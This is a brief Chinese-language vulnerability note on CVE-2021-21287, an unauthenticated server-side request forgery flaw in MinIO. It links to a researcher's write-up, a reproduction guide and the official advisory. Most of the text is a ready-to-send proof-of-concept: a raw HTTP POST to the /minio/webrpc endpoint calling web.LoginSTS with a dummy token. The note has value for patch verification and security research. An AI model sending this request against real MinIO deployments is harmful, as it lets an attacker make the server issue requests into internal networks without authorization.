MinIO未授权SSRF漏洞（CVE-2021-21287）

详情可以看PHITHON的「容器与云的碰撞——一次对MinIO的测试」：https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html

复现可以参考：https://www.o2oxy.cn/3104.html

PoC：

POST /minio/webrpc HTTP/1.1
Host: 192.168.1.142:4444
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Content-Length: 80

{"id":1,"jsonrpc":"2.0","params":{"token":  "Test"},"method":"web.LoginSTS"}

ref：

https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
https://www.o2oxy.cn/3104.html